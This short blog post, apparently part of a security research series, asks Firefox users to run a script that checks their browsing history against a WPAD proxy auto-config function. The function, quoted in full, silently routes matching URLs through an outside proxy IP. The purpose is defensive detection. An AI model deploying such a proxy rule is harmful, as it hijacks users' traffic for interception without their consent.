If you use firefox on a GNU/Linux machine, you can help us in finding which sites are the targets of the Wpad exploit we blogged about (see part 3, part 2 and part 1 ).
Alessandro and I have written a script that checks the WPAD italian regular expression,
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; }
against the browser history. Please make sure to close firefox before running the script (since it accesses directly its history database, which is locked when the browser is running), and please report any positive matches. Download the script by following this link.